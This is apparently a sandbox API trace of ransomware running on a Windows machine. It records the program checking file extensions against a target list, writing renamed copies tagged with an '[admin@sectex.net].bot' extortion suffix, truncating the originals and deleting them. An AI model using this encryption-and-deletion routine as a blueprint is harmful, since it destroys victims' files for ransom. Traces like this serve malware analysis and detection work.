	[0156.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSAutogen.dll") returned 57
	[0156.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSAutogen.dll") returned 57
	[0156.248] lstrlenW (lpString=".doc") returned 4
	[0156.248] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0156.248] lstrlenW (lpString=".docx") returned 5
	[0156.248] lstrcmpiW (lpString1=".docx", lpString2="n.dll") returned -1
	[0156.248] lstrlenW (lpString=".pdf") returned 4
	[0156.248] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0156.248] lstrlenW (lpString=".xls") returned 4
	[0156.248] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0156.248] lstrlenW (lpString=".xlsx") returned 5
	[0156.248] lstrcmpiW (lpString1=".xlsx", lpString2="n.dll") returned -1
	[0156.248] lstrlenW (lpString=".ppt") returned 4
	[0156.248] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0156.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSAutogen.dll") returned 57
	[0156.249] lstrlenW (lpString=".zip") returned 4
	[0156.249] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0156.249] lstrlenW (lpString=".rar") returned 4
	[0156.249] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0156.249] lstrlenW (lpString=".bz2") returned 4
	[0156.249] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0156.249] lstrlenW (lpString=".7z") returned 3
	[0156.249] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0156.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSAutogen.dll") returned 57
	[0156.249] lstrlenW (lpString=".dbf") returned 4
	[0156.249] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0156.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSAutogen.dll") returned 57
	[0156.249] lstrlenW (lpString=".1cd") returned 4
	[0156.249] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0156.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSAutogen.dll") returned 57
	[0156.249] lstrlenW (lpString=".jpg") returned 4
	[0156.249] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0156.249] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0156.249] lstrlenW (lpString="BCSClient.Msg.dll") returned 17
	[0156.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSClient.Msg.dll" (normalized: "c:\\program files\\microsoft office\\office14\\bcsclient.msg.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0156.250] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=39776) returned 1
	[0156.250] CloseHandle (hObject=0x38c) returned 1
	[0156.250] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSClient.Msg.dll" (normalized: "c:\\program files\\microsoft office\\office14\\bcsclient.msg.dll")) returned 0x20
	[0156.250] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSClient.Msg.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\bcsclient.msg.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.250] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSClient.Msg.dll" (normalized: "c:\\program files\\microsoft office\\office14\\bcsclient.msg.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0156.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSClient.Msg.dll") returned 60
	[0156.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSClient.Msg.dll") returned 60
	[0156.250] lstrlenW (lpString=".doc") returned 4
	[0156.250] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0156.250] lstrlenW (lpString=".docx") returned 5
	[0156.250] lstrcmpiW (lpString1=".docx", lpString2="g.dll") returned -1
	[0156.250] lstrlenW (lpString=".pdf") returned 4
	[0156.250] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0156.251] lstrlenW (lpString=".xls") returned 4
	[0156.251] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0156.251] lstrlenW (lpString=".xlsx") returned 5
	[0156.251] lstrcmpiW (lpString1=".xlsx", lpString2="g.dll") returned -1
	[0156.251] lstrlenW (lpString=".ppt") returned 4
	[0156.251] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0156.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSClient.Msg.dll") returned 60
	[0156.251] lstrlenW (lpString=".zip") returned 4
	[0156.251] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0156.251] lstrlenW (lpString=".rar") returned 4
	[0156.251] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0156.251] lstrlenW (lpString=".bz2") returned 4
	[0156.251] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0156.251] lstrlenW (lpString=".7z") returned 3
	[0156.251] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0156.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSClient.Msg.dll") returned 60
	[0156.251] lstrlenW (lpString=".dbf") returned 4
	[0156.251] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0156.252] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.252] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.252] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSClientManifest.man.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\bcsclientmanifest.man.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0156.253] GetLastError () returned 0x0
	[0156.253] ReadFile (in: hFile=0x38c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x6886, lpOverlapped=0x0) returned 1
	[0156.255] WriteFile (in: hFile=0x3e0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x6890, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x6890, lpOverlapped=0x0) returned 1
	[0156.256] ReadFile (in: hFile=0x38c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.256] WriteFile (in: hFile=0x3e0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xfe, lpOverlapped=0x0) returned 1
	[0156.256] SetEndOfFile (hFile=0x3e0) returned 1
	[0156.256] CloseHandle (hObject=0x3e0) returned 1
	[0156.256] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.257] SetEndOfFile (hFile=0x38c) returned 1
	[0156.259] CloseHandle (hObject=0x38c) returned 1
	[0156.259] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSClientManifest.man.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.260] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSClientManifest.man" (normalized: "c:\\program files\\microsoft office\\office14\\bcsclientmanifest.man")) returned 1
	[0156.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSClientManifest.man") returned 64
	[0156.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSClientManifest.man") returned 64
	[0156.260] lstrlenW (lpString=".doc") returned 4
	[0156.260] lstrcmpiW (lpString1=".doc", lpString2=".man") returned -1
	[0156.260] lstrlenW (lpString=".docx") returned 5
	[0156.260] lstrcmpiW (lpString1=".docx", lpString2="t.man") returned -1
	[0156.260] lstrlenW (lpString=".pdf") returned 4
	[0156.260] lstrcmpiW (lpString1=".pdf", lpString2=".man") returned 1
	[0156.260] lstrlenW (lpString=".xls") returned 4
	[0156.260] lstrcmpiW (lpString1=".xls", lpString2=".man") returned 1
	[0156.260] lstrlenW (lpString=".xlsx") returned 5
	[0156.260] lstrcmpiW (lpString1=".xlsx", lpString2="t.man") returned -1
	[0156.260] lstrlenW (lpString=".ppt") returned 4
	[0156.261] lstrcmpiW (lpString1=".ppt", lpString2=".man") returned 1
	[0156.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSClientManifest.man") returned 64
	[0156.261] lstrlenW (lpString=".zip") returned 4
	[0156.261] lstrcmpiW (lpString1=".zip", lpString2=".man") returned 1
	[0156.261] lstrlenW (lpString=".rar") returned 4
	[0156.261] lstrcmpiW (lpString1=".rar", lpString2=".man") returned 1
	[0156.261] lstrlenW (lpString=".bz2") returned 4
	[0156.261] lstrcmpiW (lpString1=".bz2", lpString2=".man") returned -1
	[0156.261] lstrlenW (lpString=".7z") returned 3
	[0156.261] lstrcmpiW (lpString1=".7z", lpString2="man") returned -1
	[0156.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSClientManifest.man") returned 64
	[0156.261] lstrlenW (lpString=".dbf") returned 4
	[0156.261] lstrcmpiW (lpString1=".dbf", lpString2=".man") returned -1
	[0156.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSClientManifest.man") returned 64
	[0156.261] lstrlenW (lpString=".1cd") returned 4
	[0156.261] lstrcmpiW (lpString1=".1cd", lpString2=".man") returned -1
	[0156.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSClientManifest.man") returned 64
	[0156.261] lstrlenW (lpString=".jpg") returned 4
	[0156.261] lstrcmpiW (lpString1=".jpg", lpString2=".man") returned -1
	[0156.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSClientManifest.man") returned 64
	[0156.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSClientManifest.man") returned 64
	[0156.261] lstrlenW (lpString=".doc") returned 4
	[0156.261] lstrcmpiW (lpString1=".doc", lpString2=".man") returned -1
	[0156.261] lstrlenW (lpString=".docx") returned 5
	[0156.261] lstrcmpiW (lpString1=".docx", lpString2="t.man") returned -1
	[0156.261] lstrlenW (lpString=".pdf") returned 4
	[0156.261] lstrcmpiW (lpString1=".pdf", lpString2=".man") returned 1
	[0156.261] lstrlenW (lpString=".xls") returned 4
	[0156.261] lstrcmpiW (lpString1=".xls", lpString2=".man") returned 1
	[0156.261] lstrlenW (lpString=".xlsx") returned 5
	[0156.261] lstrcmpiW (lpString1=".xlsx", lpString2="t.man") returned -1
	[0156.262] lstrlenW (lpString=".ppt") returned 4
	[0156.262] lstrcmpiW (lpString1=".ppt", lpString2=".man") returned 1
	[0156.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSClientManifest.man") returned 64
	[0156.262] lstrlenW (lpString=".zip") returned 4
	[0156.262] lstrcmpiW (lpString1=".zip", lpString2=".man") returned 1
	[0156.262] lstrlenW (lpString=".rar") returned 4
	[0156.262] lstrcmpiW (lpString1=".rar", lpString2=".man") returned 1
	[0156.262] lstrlenW (lpString=".bz2") returned 4
	[0156.262] lstrcmpiW (lpString1=".bz2", lpString2=".man") returned -1
	[0156.262] lstrlenW (lpString=".7z") returned 3
	[0156.262] lstrcmpiW (lpString1=".7z", lpString2="man") returned -1
	[0156.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSClientManifest.man") returned 64
	[0156.262] lstrlenW (lpString=".dbf") returned 4
	[0156.262] lstrcmpiW (lpString1=".dbf", lpString2=".man") returned -1
	[0156.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSClientManifest.man") returned 64
	[0156.262] lstrlenW (lpString=".1cd") returned 4
	[0156.262] lstrcmpiW (lpString1=".1cd", lpString2=".man") returned -1
	[0156.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSClientManifest.man") returned 64
	[0156.262] lstrlenW (lpString=".jpg") returned 4
	[0156.262] lstrcmpiW (lpString1=".jpg", lpString2=".man") returned -1
	[0156.262] lstrcmpiW (lpString1=".man", lpString2=".bot") returned 1
	[0156.262] lstrlenW (lpString="BCSEvents.man") returned 13
	[0156.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSEvents.man" (normalized: "c:\\program files\\microsoft office\\office14\\bcsevents.man"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0156.263] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=36177) returned 1
	[0156.263] CloseHandle (hObject=0x38c) returned 1
	[0156.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSEvents.man" (normalized: "c:\\program files\\microsoft office\\office14\\bcsevents.man")) returned 0x20
	[0156.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSEvents.man.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\bcsevents.man.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.263] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSEvents.man" (normalized: "c:\\program files\\microsoft office\\office14\\bcsevents.man"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0156.263] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.263] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.263] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSEvents.man.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\bcsevents.man.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0156.264] GetLastError () returned 0x0
	[0156.264] ReadFile (in: hFile=0x38c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x8d51, lpOverlapped=0x0) returned 1
	[0156.266] WriteFile (in: hFile=0x3e0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x8d60, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x8d60, lpOverlapped=0x0) returned 1
	[0156.268] ReadFile (in: hFile=0x38c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.268] WriteFile (in: hFile=0x3e0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xee, lpOverlapped=0x0) returned 1
	[0156.268] SetEndOfFile (hFile=0x3e0) returned 1
	[0156.268] CloseHandle (hObject=0x3e0) returned 1
	[0156.268] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.268] SetEndOfFile (hFile=0x38c) returned 1
	[0156.271] CloseHandle (hObject=0x38c) returned 1
	[0156.271] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSEvents.man.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.272] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSEvents.man" (normalized: "c:\\program files\\microsoft office\\office14\\bcsevents.man")) returned 1
	[0156.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSEvents.man") returned 56
	[0156.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSEvents.man") returned 56
	[0156.525] lstrlenW (lpString=".doc") returned 4
	[0156.525] lstrcmpiW (lpString1=".doc", lpString2=".man") returned -1
	[0156.525] lstrlenW (lpString=".docx") returned 5
	[0156.525] lstrcmpiW (lpString1=".docx", lpString2="s.man") returned -1
	[0156.525] lstrlenW (lpString=".pdf") returned 4
	[0156.525] lstrcmpiW (lpString1=".pdf", lpString2=".man") returned 1
	[0156.525] lstrlenW (lpString=".xls") returned 4
	[0156.525] lstrcmpiW (lpString1=".xls", lpString2=".man") returned 1
	[0156.525] lstrlenW (lpString=".xlsx") returned 5
	[0156.525] lstrcmpiW (lpString1=".xlsx", lpString2="s.man") returned -1
	[0156.525] lstrlenW (lpString=".ppt") returned 4
	[0156.525] lstrcmpiW (lpString1=".ppt", lpString2=".man") returned 1
	[0156.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSEvents.man") returned 56
	[0156.525] lstrlenW (lpString=".zip") returned 4
	[0156.525] lstrcmpiW (lpString1=".zip", lpString2=".man") returned 1
	[0156.525] lstrlenW (lpString=".rar") returned 4
	[0156.525] lstrcmpiW (lpString1=".rar", lpString2=".man") returned 1
	[0156.525] lstrlenW (lpString=".bz2") returned 4
	[0156.525] lstrcmpiW (lpString1=".bz2", lpString2=".man") returned -1
	[0156.525] lstrlenW (lpString=".7z") returned 3
	[0156.525] lstrcmpiW (lpString1=".7z", lpString2="man") returned -1
	[0156.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSEvents.man") returned 56
	[0156.526] lstrlenW (lpString=".dbf") returned 4
	[0156.526] lstrcmpiW (lpString1=".dbf", lpString2=".man") returned -1
	[0156.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSEvents.man") returned 56
	[0156.526] lstrlenW (lpString=".1cd") returned 4
	[0156.526] lstrcmpiW (lpString1=".1cd", lpString2=".man") returned -1
	[0156.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSEvents.man") returned 56
	[0156.526] lstrlenW (lpString=".jpg") returned 4
	[0156.526] lstrcmpiW (lpString1=".jpg", lpString2=".man") returned -1
	[0156.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSEvents.man") returned 56
	[0156.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSEvents.man") returned 56
	[0156.526] lstrlenW (lpString=".doc") returned 4
	[0156.526] lstrcmpiW (lpString1=".doc", lpString2=".man") returned -1
	[0156.526] lstrlenW (lpString=".docx") returned 5
	[0156.526] lstrcmpiW (lpString1=".docx", lpString2="s.man") returned -1
	[0156.526] lstrlenW (lpString=".pdf") returned 4
	[0156.526] lstrcmpiW (lpString1=".pdf", lpString2=".man") returned 1
	[0156.526] lstrlenW (lpString=".xls") returned 4
	[0156.526] lstrcmpiW (lpString1=".xls", lpString2=".man") returned 1
	[0156.526] lstrlenW (lpString=".xlsx") returned 5
	[0156.526] lstrcmpiW (lpString1=".xlsx", lpString2="s.man") returned -1
	[0156.526] lstrlenW (lpString=".ppt") returned 4
	[0156.526] lstrcmpiW (lpString1=".ppt", lpString2=".man") returned 1
	[0156.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSEvents.man") returned 56
	[0156.526] lstrlenW (lpString=".zip") returned 4
	[0156.526] lstrcmpiW (lpString1=".zip", lpString2=".man") returned 1
	[0156.526] lstrlenW (lpString=".rar") returned 4
	[0156.526] lstrcmpiW (lpString1=".rar", lpString2=".man") returned 1
	[0156.526] lstrlenW (lpString=".bz2") returned 4
	[0156.526] lstrcmpiW (lpString1=".bz2", lpString2=".man") returned -1
	[0156.526] lstrlenW (lpString=".7z") returned 3
	[0156.527] lstrcmpiW (lpString1=".7z", lpString2="man") returned -1
	[0156.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSEvents.man") returned 56
	[0156.527] lstrlenW (lpString=".dbf") returned 4
	[0156.527] lstrcmpiW (lpString1=".dbf", lpString2=".man") returned -1
	[0156.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSEvents.man") returned 56
	[0156.527] lstrlenW (lpString=".1cd") returned 4
	[0156.527] lstrcmpiW (lpString1=".1cd", lpString2=".man") returned -1
	[0156.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSEvents.man") returned 56
	[0156.527] lstrlenW (lpString=".jpg") returned 4
	[0156.527] lstrcmpiW (lpString1=".jpg", lpString2=".man") returned -1
	[0156.527] lstrcmpiW (lpString1=".BDR", lpString2=".bot") returned -1
	[0156.527] lstrlenW (lpString="MSART3.BDR") returned 10
	[0156.527] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART3.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart3.bdr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0156.620] GetFileSizeEx (in: hFile=0x3e0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=57646) returned 1
	[0156.620] CloseHandle (hObject=0x3e0) returned 1
	[0156.621] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART3.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart3.bdr")) returned 0x20
	[0156.621] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART3.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart3.bdr.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.621] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART3.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart3.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0156.631] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.631] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.642] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART3.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart3.bdr.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0156.665] GetLastError () returned 0x0
	[0156.672] ReadFile (in: hFile=0x3e0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0xe12e, lpOverlapped=0x0) returned 1
	[0156.707] WriteFile (in: hFile=0x3d4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe130, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe130, lpOverlapped=0x0) returned 1
	[0156.709] ReadFile (in: hFile=0x3e0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.709] WriteFile (in: hFile=0x3d4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0156.709] SetEndOfFile (hFile=0x3d4) returned 1
	[0156.709] CloseHandle (hObject=0x3d4) returned 1
	[0156.709] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.709] SetEndOfFile (hFile=0x3e0) returned 1
	[0156.712] CloseHandle (hObject=0x3e0) returned 1
	[0156.712] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART3.BDR.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.857] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART3.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart3.bdr")) returned 1
	[0157.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART3.BDR") returned 61
	[0157.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART3.BDR") returned 61
	[0157.320] lstrlenW (lpString=".doc") returned 4
	[0157.320] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0157.320] lstrlenW (lpString=".docx") returned 5
	[0157.320] lstrcmpiW (lpString1=".docx", lpString2="3.BDR") returned -1
	[0157.320] lstrlenW (lpString=".pdf") returned 4
	[0157.320] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0157.320] lstrlenW (lpString=".xls") returned 4
	[0157.320] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0157.320] lstrlenW (lpString=".xlsx") returned 5
	[0157.320] lstrcmpiW (lpString1=".xlsx", lpString2="3.BDR") returned -1
	[0157.320] lstrlenW (lpString=".ppt") returned 4
	[0157.320] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0157.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART3.BDR") returned 61
	[0157.320] lstrlenW (lpString=".zip") returned 4
	[0157.320] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0157.320] lstrlenW (lpString=".rar") returned 4
	[0157.320] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0157.320] lstrlenW (lpString=".bz2") returned 4
	[0157.320] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0157.320] lstrlenW (lpString=".7z") returned 3
	[0157.320] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0157.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART3.BDR") returned 61
	[0157.320] lstrlenW (lpString=".dbf") returned 4
	[0157.320] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0157.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART3.BDR") returned 61
	[0157.320] lstrlenW (lpString=".1cd") returned 4
	[0157.320] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
